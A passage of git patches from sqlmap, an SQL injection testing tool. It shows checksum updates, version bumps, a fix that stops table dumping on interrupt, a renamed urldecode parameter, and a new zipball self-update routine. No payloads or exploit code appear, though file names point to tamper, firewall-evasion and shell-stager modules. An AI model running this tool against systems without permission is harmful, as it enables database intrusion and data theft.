-a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py +eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -bee0a8bec4968406e93281d2b8ad62c8 lib/request/inject.py +cb05d965aa3d5871d14b5e45fe9128b4 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py -bbfe91128ab3ad65343ed449936a890b lib/request/templates.py -edfd88ee82c2b2a0a762dad1f4eb5253 lib/takeover/abstraction.py +7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py +8d31425f36a7a9c093eb9bef44589593 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py -0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py +b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py +fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -746f400dfa6dc1139f14c44574d6b948 lib/takeover/web.py -d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py -b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py +4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py +79d1ba3ab7b2552c5f09992ce08e765d lib/takeover/xp_cmdshell.py +2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py 733f3419ff2ea23f75bc24e36f4746d9 lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py +f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py -ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py -609ba6e5039de4814115b966cd72645a lib/utils/api.py +11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py +c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py -a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py -69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py -a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py +31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py +de9620f03231d8329ee8434884b6bacd lib/utils/deps.py +635ed692ab141d428d0957b71b25c1aa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py -145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py +cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py +011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py -5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py +5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py -1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py +3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py +7348ee704485651737ddbe3538271be9 lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py -47a9c7a39ad179b73a9d6f0e1f269f74 plugins/dbms/access/fingerprint.py +c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -0cf941076f4685ec8ac63f57b31a46a6 plugins/dbms/db2/connector.py +ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py 0884e475c98701f8e698150aa122fb76 plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -a660e74854f3c70606f1cc3bc450fbcc plugins/dbms/db2/fingerprint.py +ba492b2aaa6432b5548c5a8fa5eec435 plugins/dbms/db2/fingerprint.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py -4a941e7f39dc098ee489eeacc720a8cc plugins/dbms/firebird/connector.py +53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py -94a86678fd2bf6bff6c3439934f59277 plugins/dbms/firebird/fingerprint.py +bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py -61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py +271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -5fca2136204e0ea432cc7a2572244a20 plugins/dbms/informix/connector.py +9ceb9430031a26ecebe13ea49cb2a5fa plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py 35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py 9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py -39dc5c088b4d37742290acc76c47fe94 plugins/dbms/informix/syntax.py +aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -615be11d750530211af244b6ca6aef14 plugins/dbms/maxdb/enumeration.py +f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py -a833fbc30ab1133bc6ba293d97d0ef7c plugins/dbms/mssqlserver/enumeration.py -7e495d786fa8e1da96e73e2905bbd7dd plugins/dbms/mssqlserver/filesystem.py -03d463c15ebbfa4e49155b261b59db31 plugins/dbms/mssqlserver/fingerprint.py +f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py +177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py +51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py -b9e62a80bd3ead133a511f9769e5e6c3 plugins/dbms/mssqlserver/takeover.py +08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py -2bfd2369aebe2999f7333cca0895507c plugins/dbms/mysql/fingerprint.py -88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py +fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py +30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py -f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py +403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py 999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py @@ -184,8 +184,8 @@ f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py 603d533d924498378eccba4f0f196be6 plugins/dbms/postgresql/fingerprint.py -4fe6dcf2b43b6dac46f31d75e9de260d plugins/dbms/postgresql/__init__.py -c8c2d660977e3e07182e7cdf31aa786a plugins/dbms/postgresql/syntax.py +470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py +20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py 3009438ba259ca159c5ce9799f27dec1 plugins/dbms/sqlite/connector.py 5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py @@ -195,7 +195,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py -31462dc5a1cd2a1b4eba6762d18fb48c plugins/dbms/sybase/enumeration.py +426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py @@ -203,10 +203,10 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -554f925e0a66f62b8ba39dd6c95d1e7f plugins/generic/databases.py -764a8fd5a99224910885c6b94a592170 plugins/generic/entries.py +dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py +1db2e179c19e8a38e0ef5075363eb32f plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py -ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py +0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py @@ -229,7 +229,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py -55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py +4d44f868c6c97ced29e306347ce5d650 tamper/between.py e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py @@ -244,7 +244,7 @@ dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py 25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py 9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py -838212f289632526777b7224bf8aacf9 tamper/ifnull2casewhenisnull.py +3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py 91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py @@ -427,7 +427,7 @@ ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py 166eb53544536e3e86223d513b8b688d waf/proventia.py 78a40eca7ddd14c4eaf911de7748b487 waf/radware.py f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py -022956799ff08db1a39fe1484d949e54 waf/safe3.py +acb82b21f4032ceb510a58142add02ab waf/safe3.py 67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py d1b67820442199181815ec3fce27e582 waf/secureiis.py 34f0ec775835744bed601ef7c7a21c9d waf/senginx.py diff --git a/waf/safe3.py b/waf/safe3.py index 2aa46809952..2d4a294c009 100644 --- a/waf/safe3.py +++ b/waf/safe3.py @@ -23,4 +23,3 @@ def detect(get_page): break return retval - From 909a3456e3f00264456b0bab129a47063602d1f9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 14:40:32 +0100 Subject: [PATCH 069/428] Potential fix for #2980 --- lib/core/settings.py | 2 +- plugins/generic/entries.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b72893f7004..6b20b978b34 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.23" +VERSION = "1.2.3.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index c0a94627471..b5638c4096a 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -105,6 +105,9 @@ def dumpTable(self, foundData=None): tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: + if kb.dumpKeyboardInterrupt: + break + if conf.exclude and tbl in conf.exclude.split(','): infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) singleTimeLogMessage(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e2a2c59e146..058a06d560d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -36989c9805e448024fc49aabde49a69e lib/core/settings.py +f4e6be0b4a75c886fafdc080d251c57b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py @@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py -1db2e179c19e8a38e0ef5075363eb32f plugins/generic/entries.py +a9c8637f0526d751cd1a6a18f91967f5 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py From 3c5e9e75599c8b3c5728015a3fc390501da12f26 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Mar 2018 01:02:26 +0100 Subject: [PATCH 070/428] Fixes #2982 --- lib/controller/controller.py | 2 +- lib/core/common.py | 8 ++++---- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index cbe5aef917e..4e0fbfaa78b 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -152,7 +152,7 @@ def _formatInjection(inj): vector = "%s%s" % (vector, comment) data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype] data += " Title: %s\n" % title - data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus)) + data += " Payload: %s\n" % urldecode(payload, unsafe="&", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus)) data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n" return data diff --git a/lib/core/common.py b/lib/core/common.py index 3f307b1d279..a64e962ed2a 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2535,7 +2535,7 @@ def findMultipartPostBoundary(post): return retVal -def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True): +def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, spaceplus=True): """ URL decodes given value @@ -2553,14 +2553,14 @@ def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CH pass finally: if convall: - result = urllib.unquote_plus(value) if plusspace else urllib.unquote(value) + result = urllib.unquote_plus(value) if spaceplus else urllib.unquote(value) else: def _(match): charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable) char = chr(ord(match.group(1).decode("hex"))) return char if char in charset else match.group(0) result = value - if plusspace: + if spaceplus: result = result.replace('+', ' ') # plus sign has a special meaning in URL encoded data (hence the usage of urllib.unquote_plus in convall case) result = re.sub(r"%([0-9a-fA-F]{2})", _, result) @@ -3997,7 +3997,7 @@ def geturl(self): url = urldecode(request.get_full_url(), kb.pageEncoding) method = request.get_method() data = request.get_data() if request.has_data() else None - data = urldecode(data, kb.pageEncoding, plusspace=False) + data = urldecode(data, kb.pageEncoding, spaceplus=False) if not data and method and method.upper() == HTTPMETHOD.POST: debugMsg = "invalid POST form with blank data detected" diff --git a/lib/core/settings.py b/lib/core/settings.py index 6b20b978b34..d93f2fc4853 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.24" +VERSION = "1.2.3.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 058a06d560d..f9605b7ab46 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,12 +22,12 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py 62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py -a66044daa98684fde830324c54da98ee lib/controller/controller.py +2ba69df20a4ca72b4255761c3463b8a4 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py +6266f487eeafeccab0c2d7f43d20e85c lib/core/common.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f4e6be0b4a75c886fafdc080d251c57b lib/core/settings.py +13c487c03a2555f9addb386990b77004 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 5feb4c3ccdb547e55c3fff808b40afc6e88665d5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Mar 2018 13:36:10 +0100 Subject: [PATCH 071/428] Updated --update mechanism (fetching and extraction of zipball) --- lib/core/settings.py | 3 ++- lib/core/update.py | 59 +++++++++++++++++++++++++++++++++++++++++--- txt/checksum.md5 | 4 +-- 3 files changed, 59 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d93f2fc4853..62223807eab 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.25" +VERSION = "1.2.3.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -29,6 +29,7 @@ ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" +ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master" # colorful banner BANNER = """\033[01;33m\ diff --git a/lib/core/update.py b/lib/core/update.py index 18771bb1517..4d56e1396a2 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -5,21 +5,27 @@ See the file 'LICENSE' for copying permission """ +import glob import os import re +import shutil import subprocess import sys import time +import urllib +import zipfile from lib.core.common import dataToStdout from lib.core.common import getSafeExString from lib.core.common import pollProcess +from lib.core.common import readInput from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths from lib.core.revision import getRevisionNumber from lib.core.settings import GIT_REPOSITORY from lib.core.settings import IS_WIN +from lib.core.settings import ZIPBALL_PAGE from lib.core.settings import UNICODE_ENCODING def update(): @@ -29,9 +35,54 @@ def update(): success = False if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): - errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY - logger.error(errMsg) + warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository " + warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.warn(warnMsg) + + message = "do you want to try to fetch the latest 'zipball' from repository and extract it? [Y/n]" + if readInput(message, default='Y', boolean=True): + directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) + + try: + open(os.path.join(directory, "sqlmap.py"), "w+b") + except Exception, ex: + errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex)) + logger.error(errMsg) + else: + for wildcard in ('*', ".*"): + for _ in glob.glob(os.path.join(directory, wildcard)): + try: + if os.path.isdir(_): + shutil.rmtree(_) + else: + os.remove(_) + except: + pass + + if glob.glob(os.path.join(directory, '*')): + errMsg = "unable to clear the content of directory '%s'" % directory + logger.error(errMsg) + else: + try: + archive = urllib.urlretrieve(ZIPBALL_PAGE)[0] + + with zipfile.ZipFile(archive) as f: + for info in f.infolist(): + info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename) + if info.filename: + f.extract(info, directory) + + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py") + if os.path.isfile(filepath): + with open(filepath, "rb") as f: + version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1) + logger.info("updated to the latest version '%s#dev'" % version) + success = True + except Exception, ex: + logger.error("update could not be completed ('%s')" % getSafeExString(ex)) + else: + if not success: + logger.error("update could not be completed") else: infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" @@ -69,7 +120,7 @@ def update(): infoMsg += "download the latest snapshot from " infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" else: - infoMsg = "for Linux platform it's required " + infoMsg = "for Linux platform it's recommended " infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9605b7ab46..7fd8c7e67ee 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -13c487c03a2555f9addb386990b77004 lib/core/settings.py +f126d635d4d09efd76120f31ae2023ba lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -1b655a78fe4d937d39131938a4a5a1d6 lib/core/update.py +bf7f5fc45f9ca25f403066b5642cdc67 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 4cd859012a0e05d0b0d6191f67336b3d070b1b08 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Mar 2018 11:07:14 +0100 Subject: [PATCH 072/428] Switching zipball update method to experimental --- lib/core/settings.py | 2 +- lib/core/update.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 62223807eab..6f6f05cefc9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.26" +VERSION = "1.2.3.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index 4d56e1396a2..af939aa6c80 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -39,8 +39,8 @@ def update(): warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.warn(warnMsg) - message = "do you want to try to fetch the latest 'zipball' from repository and extract it? 